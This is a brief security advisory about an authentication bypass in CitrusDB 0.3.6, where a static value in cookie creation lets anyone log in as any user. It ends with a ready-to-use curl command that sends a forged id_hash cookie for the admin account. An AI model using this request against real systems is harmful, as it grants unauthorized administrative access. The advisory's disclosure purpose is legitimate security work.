10 lines
No EOL
569 B
Text
10 lines
No EOL
569 B
Text
source: http://www.securityfocus.com/bid/12560/info
|
|
|
|
CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information.
|
|
|
|
An attacker could exploit this vulnerability to log in as any existing user, including the 'admin' account.
|
|
|
|
This issue is reported to affect CitrusDB 0.3.6; earlier versions may also be affected.
|
|
|
|
curl -D - --cookie "id_hash=4b3b2c8666298ae9771e9b3d38c3f26e;
|
|
user_name=admin" http://www.example.com/citrusdb/tools/index.php |